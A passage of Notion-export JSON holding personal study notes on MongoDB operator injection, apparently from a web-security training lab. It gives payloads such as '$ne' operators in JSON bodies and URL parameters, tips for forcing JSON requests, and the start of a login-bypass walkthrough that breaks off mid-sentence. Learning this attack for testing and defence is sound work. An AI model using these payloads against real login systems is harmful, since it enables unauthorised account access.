input).","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c0-80f9-d3916b861fbe","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8035-8c71-ddeef3c0921e","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"1. JSON messages","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"1. JSON messages","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-800d-9367-d44591b9329d","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If the application sends data as JSON, you can insert an operator by nesting it inside an object.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the application sends data as JSON, you can insert an operator by nesting it inside an object.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b4-b31a-cd8e794dae36","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Normal request:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Normal request:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8029-80e1-cfea84631898","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{ \"username\": \"wiener\" }","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{ \"username\": \"wiener\" }","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-809d-9a8a-ca0643346b08","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Injected operator:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Injected operator:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80fe-9a01-fd820be74bc2","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{ \"username\": { \"$ne\": \"invalid\" } }","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{ \"username\": { \"$ne\": \"invalid\" } }","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ee-81a9-d24ce80a7785","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This tells the database: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This tells the database: ","href":null},{"type":"text","text":{"content":"find all users where username is NOT \"invalid\"","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"find all users where username is NOT \"invalid\"","href":null},{"type":"text","text":{"content":" — which usually matches everyone.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" — which usually matches everyone.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-800a-9075-c8e7cc18cfd2","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-806a-a70b-f342eca5d656","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"2. URL-based inputs","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"2. URL-based inputs","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-806f-b210-d9e4e4204762","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If data is sent via URL parameters:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If data is sent via URL parameters:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8073-92d8-cd11417419d6","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Normal request:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Normal request:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80a4-bf5c-e846fd56b438","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"username=wiener","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"username=wiener","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-8046-bd69-d13ae6010c09","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Injected operator:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Injected operator:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8072-ba88-fa58cf38315c","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:21:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"username[$ne]=invalid","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"username[$ne]=invalid","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"250dc9c5-3059-80f9-a56e-f111c4448508","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This works if the server parses URL parameters into JSON-like objects automatically.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This works if the server parses URL parameters into JSON-like objects automatically.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-802e-9314-c51aff93aa34","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8010-84ba-e3963e5b1db6","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:46:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"3. If it doesn’t work","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"3. If it doesn’t work","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80a5-bfec-f11f2f4b6843","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Sometimes the server doesn’t accept this directly. In that case:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Sometimes the server doesn’t accept this directly. In that case:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-808d-abdc-e69d9449da02","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Switch the request from ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Switch the request from ","href":null},{"type":"text","text":{"content":"GET → POST","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"GET → POST","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b6-aa4c-d6785ac3474b","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Set ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Set ","href":null},{"type":"text","text":{"content":"Content-Type: application/json","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"Content-Type: application/json","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80db-9de3-fcf439b4730c","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Put your payload directly as JSON in the request body.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Put your payload directly as JSON in the request body.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ee-b93e-d07060261b05","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8041-a104-cdec6c39bdfc","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:46:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Note on tools","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Note on tools","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ae-899e-c809d49c6935","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If you’re using a tool like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you’re using a tool like ","href":null},{"type":"text","text":{"content":"Burp Suite","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Burp Suite","href":null},{"type":"text","text":{"content":", the ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", the ","href":null},{"type":"text","text":{"content":"Content Type Converter extension","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Content Type Converter extension","href":null},{"type":"text","text":{"content":" can:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" can:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ee-bf3b-d8f2940422b4","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Convert GET → POST automatically","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Convert GET → POST automatically","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-806a-b889-e44862a68ecd","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Change URL-encoded POST data into JSON","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Change URL-encoded POST data into JSON","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-800f-ae23-e20ec62f8aa4","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Make injection testing faster","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Make injection testing faster","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-803b-a745-e236eaddacfd","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80eb-9bd7-f997730b1585","parent":{"type":"block_id","block_id":"250dc9c5-3059-802d-afa7-f46e91b1bb25"},"created_time":"2025-08-15T18:20:00.000Z","last_edited_time":"2025-08-15T18:20:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Key takeaway:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Key takeaway:","href":null},{"type":"text","text":{"content":" You’re trying to make the backend interpret your input as a query ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" You’re trying to make the backend interpret your input as a query ","href":null},{"type":"text","text":{"content":"operator","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"operator","href":null},{"type":"text","text":{"content":", not just a plain string. If it works, you can change how the database searches data.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", not just a plain string. If it works, you can change how the database searches data.","href":null}],"icon":null,"color":"default"},"archived":false}]},{"object":"block","id":"250dc9c5-3059-80f6-a16c-c9912ff26213","parent":{"type":"block_id","block_id":"250dc9c5-3059-800d-be23-d9d0b87d363a"},"created_time":"2025-08-15T18:48:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Detecting operator injection in MongoDB","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Detecting operator injection in MongoDB","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"250dc9c5-3059-80cc-b9c3-cb736e6cc828","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"The app accepts JSON login data like:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The app accepts JSON login data like:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8004-b444-f002229b92b6","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\": \"wiener\", \"password\": \"peter\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\": \"wiener\", \"password\": \"peter\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-80b4-a0d5-f1b24a94e516","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"You want to see if you can inject ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You want to see if you can inject ","href":null},{"type":"text","text":{"content":"MongoDB operators","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"MongoDB operators","href":null},{"type":"text","text":{"content":" instead of just strings.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" instead of just strings.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e3-93d7-ebc773a7add9","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-804b-a9e5-ebc31ba97163","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Step 1. Test a single field with an operator","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 1. Test a single field with an operator","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-801a-9272-e4891e0a97c7","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Send this instead:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Send this instead:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8039-85a7-f1f984d1b2be","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\": {\"$ne\": \"invalid\"}, \"password\": \"peter\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\": {\"$ne\": \"invalid\"}, \"password\": \"peter\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-80a3-b230-c224296f8382","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"$$ne","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"$$ne","href":null},{"type":"text","text":{"content":" means 